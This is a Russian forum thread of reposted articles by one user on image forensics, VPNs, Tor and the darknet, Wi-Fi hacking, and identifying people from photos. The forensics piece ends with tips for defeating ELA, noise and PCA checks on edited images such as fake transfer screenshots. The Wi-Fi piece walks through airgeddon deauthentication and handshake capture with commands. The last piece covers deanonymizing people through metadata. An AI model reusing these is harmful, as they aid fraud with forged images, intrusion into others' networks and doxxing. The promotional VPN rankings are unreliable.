https://i.gyazo.com/7aaa777d3a4b25647ae8c761a27ecd08.jpg
Иногда не нужна никакая программа, чтобы сказать, что фото побывало в фотошопе.
https://i.gyazo.com/4fc27c602307c4816ba7b09c81e1adfb.jpg
Также загружаем фото в поиск по картинкам и находим оригинал:
https://i.gyazo.com/dc983ce59d3e6e0091295dc48993b0fa.jpg
Если гугл поиск не дал результатов, есть еще один способ найти первоисточник фотографии:
В этом поможет сайт TinEye - поиск по изображениям и платформам, где эти фото хостятся. Найдет фотографии, даже если над ними была проделана определенная работа в фотошопе.
Добавьте фотографию и нажмите на "Oldest", так вы увидите первоисточник.
Если отрисовщик оказался не из новичков, то потребуются более серьезные меры. Все нижеописанные методы базируются на программеForensically.
Error Level Analysis или ELA
При сохранении фотография каждый раз сжимается, меняется количество пикселей, конвертируются цвета - так устроен формат JPEG. И даже если вы загружаете фотографии в высоком разрешении, разница в качестве все равно будет присутствовать.
При обычном осмотре фото, недочеты не так уж просто заметить, скорее даже невозможно. Тут на помощь приходит ELA - анализ фотографии на наличие наложений, различий в качестве и несоответствий в цветовой гамме. После редактирования уровень детализации значительно теряется, и любая область, темнее или светлее других, говорит о том, что фотошоп присутствовал. Работает ELA просто: обработанная область должна иметь различие в цвете.
Возьмем для примера фото из интернета. Мошенники часто делают фейковые скрины переводов, и сейчас мы будем разоблачать один из таких.
https://i.gyazo.com/d4c4b05f0209ec930860d08c68dd6640.jpg
На первый взгляд ничего необычного. Теперь загрузим фото в Forensically и выберем "Error Level Analysis".
https://i.gyazo.com/e551d16bc85ccbae64e5a6e409f370d8.jpg
Обратите внимание на появившиеся вклейки, которые отображаются другим цветом. Можно с 99 % уверенностью сказать, что фотография подвергалась монтажу.
ELA не всегда работает верно. Если мы возьмем любую фотографию с контрастным фоном, то анализ покажет тот же самый результат.
https://i.gyazo.com/4a78f6b628fd14d171b4086a55e80273.jpg
Именно поэтому нельзя полностью доверять этому методу. Для работы с ELA выбирайте фото с однотонными областями и без резких переходов. И всегда перепроверяйте с помощью других методов.
Noise Level Analysis
Исходное изображение и наложенная картинка или текст имеют различия в шумах. Так, Noise Level Analysis ищет шум и деформацию, появившиеся после редактирования.
Снова проверим на нашей картинке:
https://i.gyazo.com/dbbcaa84f8475972023df3f17750a879.jpg
Что наблюдаем? А видим мы увеличение шума в той же области, чего быть не должно.
Luminance Gradient Analysis
Покажет наличие фотошопа, ретуши, хромакея.
Работает данный способ со светом, который присутствует на любой фотографии. Как в жизни, так и на фото на объект всегда направлен источник света: чем ближе он к источнику, тем освещенность выше, дальше - ниже.
Рассмотрим на примере двух фотографий: НЛО и самолет в небе.
https://i.gyazo.com/2ca047d6d09abb1244b84c2cc64ce697.jpg
После анализа фотографии на градиент освещенности, было замечено, что свет падает неестественно, переход между тенями и светлыми участками слишком резкий. Чтобы окончательно убедиться в нереальности НЛО ( ̶я̶ ̶х̶о̶ч̶у̶ ̶в̶е̶р̶и̶т̶ь̶), мы добавим фотографию на проверку шумов. Вся тарелка светится как солнце в ясный день, что окончательно подтверждает нашу теорию.
Для сравнения возьмем другое фото:
https://i.gyazo.com/a329ab3b10efc78b6d84df7872fa17e2.jpg
Сравните как равномерно падает свет на самолет, никаких резких переходов - вверху область с наибольшей освещенностью, внизу с наименьшей - это говорит о рассеянном свете.
Данный метод определения монтажа один из самых выигрышных, он работает практически на любой фотографии, и любителям фотошопа не всегда удается его обхитрить.
Principal Component Analysis или PCA
Простым языком суть этого метода заключается в том, что если объекты находятся не на своих местах, то они будут отображаться на PCA в виде ярких пикселей, несоответствий цветов. Это будет значить, что на фото присутствует локальный монтаж (Healing Brush) или вклейка (Clone Stamp), или все вместе как на нашем примере:
https://i.gyazo.com/97fa6c9cb097b0a577e8867a9535b708.jpg
На фоне тарелки и на самом небе есть очень заметные пиксели. Скорее всего помимо полной вклейки проводилась и другая работа над картинкой, возможно, точечно удалялись птицы. Стоит отметить, что подобные крупные пиксели не всегда бывают на фото, чаще всего требуется увеличивать зум в различных областях и долго всматриваться, чтобы найти "обман".
Как обхитрить
Error Level Analysis
Не хочешь, чтобы переходы и различия в цвете выдали твой потрясающий монтаж? Пересохрани фотографию 10 раз, и ELA не покажет ничего примечательного.
Если не охота заморачиваться с сохранением, то можно изменить размер на любой коэффициент не кратный 2. Например, уменьшаем фото на 7% - ELA становится бесполезным.
Используйте формат PNG на двух фотографиях, ELA работает только c JPEG.
Noise Level Analysis
Как скрыть появившийся шум на фото? Добавить своего шума, так чтобы нельзя было понять, где какой шум начинается.
Если для обмана ELA мы меняли размер, то здесь нужно изменить качество раза так в 2.
Principal Component Analysis
Замыльте место редактирования, так цвета и переходы станут более плавными и анализ фото по PCA не даст результатов.
В случае как и с ELA, поможет изменение размера.
Итог:
Из-за растущей популярности ко всевозможным редакторам возникает некий ряд проблем, который может поставить под сомнение честность и добросовестность человека, использующего фотошоп. Дабы не дать себя обмануть, и самому не попасться на неумелом монтаже, мы разобрались как работают инструменты и как их можно обходить.
Image Forensics не совершенен. Он хорошо действует в том случае, когда человек не пытался утаить свою обработку. Если же монтажер знает о способах сокрытия своего обмана, то тут криминалистика изображений мало чем может помочь. Тем не менее, даже самый умелый пользователь фотошопа может совершить ошибку, что уж тут сказать про обычного человека.
https://telegra.ph/Ne-ver-svoim-glaz...-na-foto-01-28
BlackMAST
24.03.2022, 18:13
https://i.gyazo.com/250a7db297700a346d0b7b5122f7f015.jpg
VPN от А до Я
Вступить в наш чат
VPN становится все более обязательным инструментом в наше время, ведь мы рискуем рассекретить себя каждый день. VPN - это уже не прихоть, а необходимость для каждого человека, который беспокоится о своей безопасности. Именно с VPN и начинается любая базовая защита в интернете. Если вы не хотите утечки своих личных данных, то самое время приоткрыть завесу и узнать, что же такое VPN, как он работает, какие виды VPN существуют, от чего защищает и самое важное - какой VPN лучше всего выбрать. Итак, мы начинаем.
https://i.gyazo.com/1e7dc74422b356979011ad932bb572da.gif
Что такое VPN
Аббревиатура VPN - Virtual Private Network, что в переводе значит виртуальная частная сеть. Это сервис, позволяющий защитить данные в сети путем их шифрования. Никто, в том числе и интернет-провайдер, не сможет прочесть и отследить запрашиваемую вами информацию в сети, потому что она исходит в виде зашифрованного трафика. VPN меняет ваш IP на свой адрес, поэтому вы обеспечиваете себе безопасное пользование сетью.
Как работает VPN
Соединение VPN можно охарактеризовать как канал между между вашим компьютером и компьютером-сервером, где узлы шифруют информацию до ее попадания в канал.
Вся работа VPN наглядно показана на следующей картинке:
https://i.gyazo.com/b2382deca87460ef24dac059baae0a0f.jpg
Ваш компьютер подключается к VPN и начинается процесс аутентификации;
Исходящий VPN пересылает информацию к сайту или серверу к которому вы обращались, то есть авторизует вас;
В результате установленного соединения весь трафик проходит путь в зашифрованном виде, следовательно, вы остаетесь в тени.
Для чего нужен VPN
В первую очередь VPN нужен для безопасного соединения, защиты трафика и сохранения анонимности;
VPN защищает от слежек, хакерских атак и перехвата данных;
VPN скрывает ваш реальный IP-адрес;
Дает доступ к заблокированным сайтам, форумам без ограничений;
Защищает от перехвата трафика в WI-FI сети.
Double VPN, Triple VPN, Quad VPN
С появлением обычных VPN, появились и сервисы, предоставляющие двойной, тройной VPN. Это связка нескольких VPN серверов, где вначале создается подключение между компьютером пользователя и первым VPN сервером. Затем создается второй шифрованный канал между первым и вторым VPN сервером, так трафик шифруется, и ваш IP адрес меняется несколько раз (дважды, трижды и т.д.).
https://i.gyazo.com/1de3897fb4c0fac99e7584cc05c961b0.jpg
Плюсы:
Провайдер видит первое подключение к VPN, но так как вы заходите в сеть еще и через второй сервер VPN, то он не знает ваш конечный IP адрес.
При каждом переподключении меняется ваш IP адрес: второй VPN сервер не знает ваш настоящий IP, потому что он скрыт первым VPN.
Минусы:
На каждом VPN сервере происходит расшифровка трафика.
Значительное снижение скорости (особенно при использовании Triple VPN и Quad VPN) из-за шифрования трафика, удаленности между несколькими серверами.
Итог:
Если вы не занимаетесь черными делишками и просто хотите скрыть настоящий IP, то вам идеально подойдет обычный VPN. Если вы думаете, что кому-то станет интересна ваша деятельность, то стоит сказать в пользу Double VPN, потому что двойное подключение действительно повышает вашу анонимность.
Нет необходимости использовать Triple VPN, Quad VPN, так как скорость подключения очень сильно пострадает, а дополнительный уровень защиты не прибавится.
Ну и, конечно же, не забывайте о комплексном подходе к защите и используйте и другие способы для вашей анонимности.
Но, чтобы не вводить себя в заблуждение, что VPN - универсальный способ безопасности, мы посмотрим, когда и в каких случаях VPN бесполезен:
https://i.gyazo.com/94f4ad317c677601e442c2a33a5836fd.gif
Спам. Вы получили фишинговое письмо в мессенджер, перешли по ссылке и тут же хакеры получили все, что хотели. Вывод: никогда не переходите по непонятным ссылкам от сомнительных отправителей, VPN в этом случае вам не поможет. Проверить ссылку на наличие спама, вирусов и фишинга можно тут или здесь.
Чужой ПК. Вам пришлось поработать на компьютере, которым вы ранее не пользовались. Но он оказался зараженным, и все ваши данные утекли с концами. Вывод: VPN не поможет от троянов, никогда не пренебрегайте антивирусом и пользуйтесь только проверенными ПК.
Сайты, которые вас палят. Вы сидите через нидерландский VPN и наблюдаете всплывающую рекламу на русском языке. Спросите: "как такое возможно?". Существует N-количество сайтов, которые следят за вами и пытаются узнать ваш настоящий IP-адрес. Если VPN не защищает от такого обнаружения, то сайтам это удастся. Помимо этого, сайты с легкостью могут деанонимизировать вас по следующим параметрам: язык операционной системы, версия браузера, сохраненные данные и др. Вывод: проверяйте безопасность подключения и наличие возможных утечек IP здесь, если утечка была, то действуйте следующим способом.
Подставной VPN провайдер. Вы бесплатно скачали VPN на первом сайте адресной строки. Но сами не подозревая, только усугубили ситуацию. Многие VPN провайдеры, видя весь ваш трафик через VPN сервис, промышляют злодеяниями. А именно: перенаправляют вас на вредоносные сайты, где вы заражаете свой компьютер. Вывод: Забудьте про существование бесплатных VPN, покупайте только у проверенных VPN провайдеров, безопасность превыше всего!
К слову про того, как выбрать VPN, мы составили ТОП-5 надежных сервисов. Как уже было сказано ранее, не стоит доверять бесплатным VPN и экономить на своей безопасности.
Поехали!
Лучшие VPN:
NordVPN
Занимает первые позиции во многих обзорах и рейтингах VPN;
Самые мощные шифровальные алгоритмы, Double VPN, VPN+TOR и другие технологии для полной конфиденциальности;
Наличие функции kill switch, которая завершает подключение к интернету, когда связь с сервером VPN становится нестабильной;
Компания находится в Панаме, поэтому имеет независимый статус, т. е. деятельность пользователей никак не фиксируется и никому не передается;
Отказ от ведения логов;
Имеет программы-клиенты для ПК (Windows, MacOS) и для телефонов (Android, IOS).
Сервис, безусловно, платный. Стоимость подписки:
https://i.gyazo.com/2bb11d3fb9ef078a105d4e8ee202e450.jpg
Surfshark
Главное отличие от NordVPN - это безлимитное количество устройств, в то время как в NordVPN разрешается не более 6;
Компания гарантирует защиту трафика путем шифрования военного уровня и технологий собственной разработки. Ваши действия не отслеживаются и не хранятся, логи не ведутся;
Наличие частного DNS на каждом сервере и защита от утечек при использовании стека IPv4;
Автоматически выбирает самый быстрый сервер для подключения, но так же можно указать страну вручную.;
Подстраховка в виде Kill Switch на случай, если VPN подключение прервется.
Стоимость подписки примерно такая же, как и у NordVPN:
https://i.gyazo.com/65eab5ae401eccde75737cbd4e11e025.jpg
CyberGhost
Универсальный VPN из Румынии с надежной политикой ведения логов: не записывает информацию о посещении сайтов и скрывает IP адрес;
Бесплатный период - 7 дней;
Разрешает до 7 одновременных подключений с одного аккаунта;
Поддержка 24/7, которая готова ответить на вопросы по работе провайдера;
При построении защищённой системы использует разные протоколы: OpenVPN, L2TP\IPsec, и IKEv2;
Большое количество платформ, в том числе ОС телевизоров и роутеров;
Поддержка P2P на отдельных серверах.
https://i.gyazo.com/d4bb1ffe4381709418dc5065d7c785b7.jpg
PureVPN
Штаб-квартира в Гонконге;
Безопасность военного уровня гарантирует пользователю высокую конфиденциальность;
Совместимость практически со всеми существующими платформами и ОС;
Техподдержка 24 часа в сутки, 7 дней в неделю, 365 дней в году;
Наличие Kill Switch - безопасное отключение от сети;
До 5 устройств одновременно.
Стоимость:
https://i.gyazo.com/b9c320448f18b7e191161781bc38ee33.jpg
Мастер VPN
Высокая степень безопасности и защищенности;
При построении защищённой системы использует разные протоколы: OpenVPN сервер, DoubleVPN или IKEv2;
Индивидуальный заказ. Создается любая конфигурация в зависимости от ваших задач;
Имеет программы-клиенты для ПК, для телефонов и планшетов;
Единоразовая плата - 1500-2000 р.
Мы разобрали различные популярные VPN-сервисы и рассмотрели их плюсы.
Если вы дорожите своей безопасностью, вам важно удобство и индивидуальный подход за небольшую плату- то однозначно обратите внимание на MasterVPN.
Вывод:
Относитесь серьезно к вашей безопасности и пользуйтесь только надежными VPN сервисами. К сожалению, многие платные и бесплатные VPN сервисы лишь создают иллюзию защиты, а на самом деле ведут логи, собирая о вас информацию. К тому же, несмотря на то что VPN использует надежные алгоритмы шифрования, он не гарантирует 100% сохранения анонимности, поэтому помимо VPN существуют и другие способы защиты - Proxy, Tor, которые следует использовать в связке. Надеюсь, что вы почерпнули что-нибудь новое из данной статьи. В следующий раз мы научимся самостоятельно настраивать собственный VPN сервер и VPN на роутере.
"Если не уверен в безопасности, считай, что опасность реально существует."
https://telegra.ph/VPN-ot-A-do-YA-02-01
BlackMAST
24.03.2022, 18:15
https://i.gyazo.com/c2edb913a0f0d7b16e37de65746e8cf3.jpg
Tor browser - что это за "овощ" такой и с чем его едят?
Вступить в наш чат
На просторах даркнета не стоит забывать о безопасности. Вы можете стать отшельником, уехать в глушь, прихватив с собой ноутбук, захламить рабочий стол VPN сервисами, но при этом все равно вас легко смогут вычислить.
Данная статья будет полезна всем, кто только начинает открывать для себя теневой интернет мир и для тех, кто хочет оградить себя от неприятных последствий.
Одним из обходных путей, способным запутать цепочку являетсябраузер Tor. Мы разберем с вами основные FAQ, а также выясним как его установить на ПК и Android. А приятным бонусом ко всему будут полезные фишки, которые облегчат и ускорят работу с данным браузером. Так что читай до конца.
Что такое TOR?
TOR - это аббревиатура от слов The Onion Router, что в переводе означает "Луковый маршрутизатор". Само название говорит о принципе его работы. Tor трижды кодирует ваш трафик, тем самым создавая три слоя луковицы. Его задача - это соединить ваш компьютер с другими тремя компьютерами, чтобы не было понятно откуда изначально пришел трафик и куда он направляется.
https://i.gyazo.com/f25c16bf318ebfbdee928260e90f88cd.jpg
Для чего нужен TOR?
Основная задача, с которой прекрасно справляется данный браузер - сохранение анонимности. Под «анонимностью» обычно понимают, что пользователю удается скрыть от третьих лиц:
свою геопозицию и даже страну, с территории которой он выходит в сеть;
сайты, к которым он обращается;
временные периоды, в течение которых устанавливаются соединения;
сведения об аппаратном и программном обеспечении, которое он использует.
Также Tor нужен для того, чтобы попасть в Tor Network и обойти блокировки Роскомнадзора.
Что такое Tor Network?
Это теневой интернет, который целиком состоит из компьютеров с установленными на них TOR-ами. То есть каждый сервер в Tor Network обязательно имеет TOR - луковый маршрутизатор. С помощью Tor Network можно попасть на сайты .onion.
Нужно ли использовать Tor вместе с VPN?
Да, подключение этого типа помешает узлам Tor узнать ваш исходный IP-адрес, что послужит дополнительным уровнем защиты. VPN скрывает от провайдера сам факт использования Tor, он увидит лишь зашифрованный трафик, отправленный вашему VPN-серверу. Вы можете сначала подключиться к VPN, а потом к Tor (получится VPN -> Tor).
Что такое мосты?
Это входные ноды (узлы) Tor, которые передают данные с дополнительной защитой. Мосты придумали для того, чтобы трафик Tor невозможно было заблокировать, поскольку они шифруют его на отрезке - абонент -> входная нода. В конце статьи я поделюсь с вами лайфхаком как их создать.
Устанавливаем TOR на компьютер
Переходим на официальный сайт https://www.torproject.org/
https://i.gyazo.com/a2797b126aee2f4dcf3fa14452e0235a.jpg
Нажимаем "Download Tor Browser".
https://i.gyazo.com/10d46ae50c4d2cefd5dfdaa9a7b37da2.jpg
После выбираете вашу операционную систему и ждете окончания загрузки.
https://i.gyazo.com/53449151bce0b77d9fd1c1b1aca0df3c.jpg
После окончания установки открывается окно, где нужно нажать "Connect".
https://i.gyazo.com/e19579f67458aceb85cb1520fb2178b0.jpg
Через несколько секунд у нас открывается браузер, теперь мы можем открывать ссылки ".onion".
Устанавливаем TOR на телефон
Заходим в Play Market здесь нам понадобится установить 2 приложения - TOR Browser и Orbot. В App Store нет официального приложения TOR Browser и Orbot, поэтому придется поискать аналоги.
https://i.gyazo.com/41d87c1c1cd317fd798dd57c9858e7b3.jpg
https://i.gyazo.com/91b6bd855ad9448118164c4256f531df.jpg
Как только всё установили, запускаем Orbot и включаем режим VPN.
https://i.gyazo.com/46458685c67d538bad518f66e3a0b910.jpg
Готово! Можете открывать браузер и пользоваться.
Минусы Tor:
провайдер может увидеть, что вы пользуетесь Tor, но ему известен только сам факт его использования, трафик шифруется внутри Tor и остается в его пределах;
Tor замедляет скорость вашего интернета, поскольку трафик проходит через большое количество ретрансляторов;
Tor не может защитить вас полностью, если вы пренебрегаете осторожностью (платите со своей карты, скачиваете торренты, заходите в соцсети);
Многие веб-сервисы ограничивают доступ к Tor. При посещении таких сайтов вы можете столкнуться с ошибкой, например, 404.
Несмотря на небольшое количество недостатков, Tor вполне справляется с обеспечением вашей анонимности и безопасности на просторах интернета.
Полезные фишки при работе с Tor:
Отключаем анимацию банеров
Банеры расположены на всех теневых площадках, иногда в огромном количестве, что не может не надоесть. Отключение займет не больше 1 минуты.
https://i.gyazo.com/35289ef8b00edd48b63e767caa18291a.jpg
https://i.gyazo.com/59223c55c41631db751628972bcc54df.jpg
Подтверждаем наше действие.
https://i.gyazo.com/7ebc7a528e02529602421db1c7d26290.jpg
Вводим в поиск image.animationи кликаем на значок редактирования.
https://i.gyazo.com/6f4f4f7c835e71b0bfed83db258cb53c.jpg
Изменяем параметр normal на none.
Готово! Осталось перезапустить браузер и наслаждаться отсутствием рекламы.
Ищем сайты .onion
Если вы все сделали правильно и установили Tor, то у вас все равно может возникнуть вопрос: "Так как же попасть в даркнет?" В этом нам помогут сайты .onion. Многие люди, не понимая как их найти, продолжают искать информацию через duckduckgo - встроенный поисковик в браузере.
А ведь по сравнению с обычными версиями сайтов .onion обеспечивают дополнительную анонимность и безопасность, так как подобные адреса не являются полноценными записями DNS, и информация о них не хранится в корневых серверах DNS.
OnionLand Search - актуальная ссылка
https://i.gyazo.com/91b6745881edc7a89b8c9a2c889e951a.jpg
Кто ищет, тот всегда найдет
https://darkmoney.one/images/smilies/smile.gif
Настройка мостов
https://i.gyazo.com/66d86aab23ba73c7308c1bd36bbead88.jpg
Запускаем Браузер, затем открываем параметры.
https://i.gyazo.com/e651bd1f999d2a64045df0c34408590d.jpg
Слева выбираем Tor и устанавливаем все параметры как на скриншоте.
https://i.gyazo.com/9758ba299e226ec6f225ab49c7c2dbec.jpg
Перезапускаем браузер, открываем любой сайт. А теперь проверяем, нажав на значок "замок" слева в адресной строке.
Таким образом мы научились настраивать мост.
Надеюсь, что данная статья была полезной. Успехов!
https://telegra.ph/Tor-browser---cht...go-edyat-03-04
BlackMAST
24.03.2022, 18:18
https://i.gyazo.com/6f50461855feb324974a32533ca20142.jpg
VPN на роутере: что это такое и как настроить
Вступить в наш чат
VPN-сервисы используются повсеместно, поскольку они являются гарантом безопасности в интернете: защита от хакерских атак и перехвата данных, возможность скрыть ваш настоящий IP-адрес, доступ к заблокированному контенту и многие другие вещи, которые подвластны виртуальным частным сетям.
Из прошлой статьи мы выяснили, что не все сервисы предоставляют VPN, который поддерживает неограниченное количество устройств. Если так случилось, что вам нужно одновременно установить VPN на 10 устройств, и вы не хотите устанавливать и настраивать его на каждом из них, то самое время поговорить про VPN подключение на роутере. Мы разберемся, как легко и просто это сделать всего за 15 минут.
https://i.gyazo.com/5eb6631e2ffdf6ced690508b0fa37f2b.jpg
Чтобы пользоваться VPN на роутере вам понадобится:
выбрать надежный VPN-сервис;
определиться с роутером;
настроить VPN.
VPN-сервис
К сожалению, нельзя доверять каждому сервису, который предоставляет VPN. Не советуем рисковать и выбирать первый попавшийся, лучше ознакомьтесь с нашим ТОП-5 VPN, о которых мы писали в предыдущей статье, так вы убережете себя от возможных ошибок.
Преднастроенный VPN-роутер
Преднастроенный роутер - самый дорогой из VPN-роутеров. За эти деньги вы получаете уже готовое к работе устройство, не требующее перепрошивки или настройки. При выборе роутера следует обратить внимание на следующие пункты:
Решите какой VPN-протокол вам требуется. Например, если вы остановите свой выбор на Open VPN, то лучше всего будет приобрести роутер с одноядерным процессором. Open VPN отличается высоким уровнем шифрования, поэтому скорость подключения может значительно снижаться.
Вдобавок к этому, если скорость для вас является решающим фактором, то покупайте роутер с процессором не менее 800 МГц.
Как прошить роутер самостоятельно
VPN-роутер - недешевое удовольствие, поэтому неудивительно, что вам не захочется покупать его.Но же тогда делать? Можно ли использовать старый роутер?
И ответ положительный. Нет нужды покупать еще один роутер, если мы можем перепрошить старый, используя специальное ПО. Переходим на официальные сайты прошивок и ищем наше устройство DD-WRT и Tomato. Посмотрите, поддерживает ли ваш роутер прошивку, они доступны для большинства моделей роутеров.
DD-WRT - универсальный вариант, поддерживается множеством производителей, даже самыми малоизвестными: TP-Link, D-Link, Tenda.
Tomato - прошивка с меньшим количеством поддерживаемых устройств, но имеющая более простой интерфейс. Также является более подходящим вариантом для протокола OpenVPN.
Настройка VPN-роутера
Если роутер поддерживается одну из двух прошивок, то действуем следующим образом:
Загружаем прошивку с официального сайта;
Делаем сброс настроек. Для этого нажмите и удерживайте кнопку RESET на задней части устройства в течение 30 секунд, затем отключите роутер от питания и держите RESET еще в течение 30 секунд, включите роутер и снова зажмите эту же кнопку на 30 секунд.
Чтобы настроить VPN-соединение, заходим в панель управления роутера через браузер. Адрес, по которому можно попасть на эту страницу, указывается в руководстве каждого роутера. Там же будут написаны и заводские данные для входа. Например, вводим в адресной строке браузера 192.168.0.1 или 192.168.1.1. Логин и пароль по умолчанию - admin.
В панели управления (слева) выберите опцию обновления UPGRADE или UPLOAD FIRMWARE.
Как только новая вкладка открылась, загрузите файл установки, а именно ранее скачанную прошивку Tomato или DD-WRT.
Во время установки не делайте никаких действий, дождитесь несколько минут, когда файл загрузится и выберите Продолжить.
Напоследок сделайте еще один полный сброс настроек и войдите в панель управления роутера. Если все сделали верно, то вы увидите новую функцию VPN.
Данная инструкция по перепрошивке подходит практически для каждой модели роутера.
К сожалению, если роутер не поддерживает такую возможность, то вам все же потребуется купить новое устройство.
Плюсы:
Неограниченное количество устройств. VPN будет защищать все новые устройства, которые вы подключаете, и вы сможете делиться защищенным подключением с членами семьи и друзьями, когда они подключатся к вашему Wi-Fi;
Совместимость с большим количеством платформ. У вас есть приставка Apple TV, но вы не можете установить на нее VPN? Однако вы хотите смотреть контент, доступ к которому ограничили в вашей стране. Воспользуйтесь VPN-роутером;
Вам нужно ввести логин и пароль только единожды. После того, как вы настроите VPN-роутер в первый раз, вам больше не нужно будет переживать по этому поводу, пользуйтесь сколько захотите.
Минусы:
Цена. Да, как мы уже выясняли покупать новый роутер с преднастроенной прошивкой не очень дешево. Хотя прошить роутер, как оказалось, не так уж и сложно, что можно определенно отнести к преимуществам;
Больше устройств - ниже скорость. Имейте в виду, что с каждым новым подключенным устройством, значительно падает производительность.
Вывод
Рассмотрев все явные преимущества и недостатки VPN-роутеров, можно отметить, что первых все-таки больше. При выборе стоит взвесить все ваши нужды и потребности: что вы ждете от VPN, сколько платформ вы используете, какой у вас бюжет. Если у вас всего 1 устройство и вам не нужно больше, то смысла в VPN-роутере нет. Но если же вам хочется пользоваться интернетом на многих устройствах и при этом быть уверенным в своей конфиденциальности и безопасности, то не пожалейте 15 минут и настройте VPN-роутер.
https://telegra.ph/vpn-02-04
BlackMAST
24.03.2022, 18:21
https://i.gyazo.com/22fe8f6dc242d8439a9424d60a6ed701.jpg
Учимся взламывать Wi-Fi всего за несколько шагов
Вступить в наш чат
Существует куча способов как взломать Wi-Fi. И это еще больше убеждает нас лишний раз подумать о дополнительной защите, а именно о необходимости использовать VPN. Подробнее об этом читайте здесь. В данной же статье мы рассмотрим самые распространенные методы взлома и на примере Kali Linux научимся перехвачивать handshake.
Текст статьи не является призывом к действию и публикуется для ознакомления со способами взлома и построения грамотной защиты.
Виды взлома:
Перехват handshake - отключаем всех от сети, ловим пакет с авторизацией любого клиента и расшифровываем его;
Brute-force паролей - перебор всех комбинаций возможных паролей по словарю;
Фишинг - отправка фишинговой (левой) страницы пользователю Wi-Fi, с запросом на ввод пароля для входа(например, под предлогом обновления). Такой взлом можно делать самостоятельно или с помощью специального приложения Wifiphisher;
WPS - подбор вероятных паролей или взлом стандартных заводских PIN-кодов. Роутеров с включённым WPS становится всё меньше, но этот способ еще имеет место быть.
Существуют и другие подходы к получению доступа, но мы не будем на них зацикливаться и перейдем к практической части - взлом с использованием Kali handshake.
Kali Linux
Kali является лучшим бесплатным дистрибутивом для осуществления хакерских атак. Kali включает в себя более 300 утилит для удобства в работе, поддерживает практически все файловые системы, интерфейсы и типы накопителей. Если вы пользователь Windows, но хотите испытать Kali в деле, то перед началом установите дистрибутив на VirtualBox.
1. Установка Kali в VirtualBox
Устанавливаем последнюю версию VirtualBox и скачиваем Kali Linux VirtualBox.
Выбираем 64-Bit или 32-Bit.
https://i.gyazo.com/cb2c4461cf66d4e69421bdb052948983.jpg
После того как VirtualBox установилось на ваш ПК, открываем и выбираем опцию Импортировать.
https://i.gyazo.com/f2d354aeb35804efa01181e8045aa59b.jpg
Выбираем Kali Linux, устанавливаем количество ядер и ОЗУ для виртуальной машины и жмем на Импорт.
https://i.gyazo.com/dbd3132744c61e120d6e2f141420ca3e.jpg
Запускаем Kali Linux и вводим логин kali и пароль kali.
https://i.gyazo.com/debd9f9e10e84bdc24f2682df9eb840f.jpg
Перед тем, как перейти к непосредственной установке, вам нужно открыть терминал на компьютере с Kali Linux. Найдите и щелкните по иконке приложения Терминал или просто нажмите Alt+Ctrl+T.
2. Установка airgeddon
Скачиваем утилиту airgeddon на нашу машину с Kali. Данной утилиты нет по умолчанию в Kali, но она нам нужна для перехвата handshake.
sudo git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git Переходим в папку с установленной airgeddon и запускаем ее командой:
cd airgeddon/ sudo ./airgeddon.sh
3. Установка bettercap
Вероятнее всего у вас тоже не будет хватать утилиты bettercap. Bettercap – программа для мониторинга и спуфинга (когда программа маскируется под другую с помощью подмены данных). Устанавливаем этот инструмент, вводим в терминале простую команду:
sudo apt install bettercap
4. Мониторинг сети
Если к компьютеру подключен USB Wi-Fi адаптер, включим его следующим образом: Устройства → USB → MediaTek 802.11 n WLAN. Название Wi-Fi адаптера может отличаться, поэтому чтобы его узнать вводим команды ifconfig или ip a.
Далее выберите свой Wi-Fi адаптер. В нашем случае адаптер называется wlan0.
Переходим в главное меню и переводим наш адаптер в режим мониторинга, это цифра 2.
https://i.gyazo.com/c544516419f4f2d54c61292839d524bd.jpg
5.Получение рукопожатий
Переходим в меню инструментов для работы c handshake, выбрав цифру 5. В этом меню нам нужно запустить поиск цели - цифра 4. Как только появится наша Wi-Fi точка, можно заканчивать поиск, для этого нажмем Ctrl+C. После чего выберите ее из списка.
Стоит отметить, что если на точке не будет пользователей, то сделать handshake не получится.
Цель выбрана, а значит цифрой 6 переходим в режим захват рукопожатия.
Мы наблюдаем 3 вида атаки:
1.Атака деаутентификации/разъединения amok mdk3
2.Атака деаутентификации aireplay
3.Атака смешения WIDS/WIPS/WDSУстройства
Нам же нужно выбрать вторую-Атака деаутентификации aireplay.
Этот способ лучше 1-го по той причине, что вам не придется ждать, когда пользователь введет пароль от точки.
Далее идет перехват, и вам предлагают прописать путь сохранения handshake в папке, что и нужно сделать.
На этом взлом handshake успешно закончен.
Итог
Итак, вы узнали какие способы взлома существуют, на примере научились делать мониторинг Wi-Fi сети и перехватывать рукопожатия. Вдобавок хочется поделиться несколькими советами для повышения вашей безопасности:
Используйте VPN. Это основное и самое главное правило, если вы не хотите стать мишенью для недоброжелателей;
Выключите режим WPS в роутере;
Придумайте сложный пароль и регулярно меняйте его;
Периодически обновляйте прошивку роутера.
Всем безопасного серфинга!
https://telegra.ph/Uchimsya-vzlamyva...o-shagov-02-07
BlackMAST
24.03.2022, 18:22
https://i.gyazo.com/3465819ee8d9f339403b8b4a9aec4ddb.jpg
Как пробить человека по фотографии
Вступить в наш чат
Найти человека в интернете по фото - это давно уже миф, а реальность. Даже одна фотография может выдать кучу информации: начиная от метаданных и заканчивая координатами, которые можно определить по виднеющейся улице на заднем плане. В этой статье мы поговорим о том, как деанонимизировать человека с помощью простых, а главное бесплатных средств.
Но для начала разберемся как устроен поиск по фотографиям, чтобы лучше понять его суть.
https://i.gyazo.com/4c22a2002d26b43b4057540e2185b246.jpg
Метаданные, они же EXIF
Любая фотография формата JPEG содержит в себе метаданные. Они включают дату, название модели камеры или смартфона, а еще редактирование, если оно имело место быть. Но и самое интересное, что иногда метаданные могут показать геолокацию фотографии.
Именно с EXIF следует начинать поиск. Несмотря на то что любое устройство может отобразить эту информацию, возможности просмотра будут ограничены. Поэтому на помощь приходят специальные программы для расширенного просмотра.
ПриложениеExifTool является одной из таких, оно может прочесть огромный перечень данных с фото. И то не только EXIF, а еще и GPS, XMP, IPTC, JFIF, GeoTIFF, ICC Profile, Photoshop IRB и другие. Приложение бесплатное и поддерживает как Windows, так и MacOS.
https://i.gyazo.com/9078af31fd0bcc975a57b229e89351eb.png
Jeffrey's Image Metadata Viewer - сайт для определения EXIF, аналог ExifTool, разница лишь в том, что не требует установки на ПК.
Stolencamerafinder.com — определит метаданные и найдет какие еще фото были сделаны с помощью этого устройства.
Помимо этого, есть еще несколько сервисов для работы с этими данными:
Если на фотографии определилась геолокация, то сайт pic2map покажет на карте конкретное место, где было сделано фото.
С помощью сервиса https://29a.ch/photo-forensics можно определить, подверглась ли фотография монтажу.
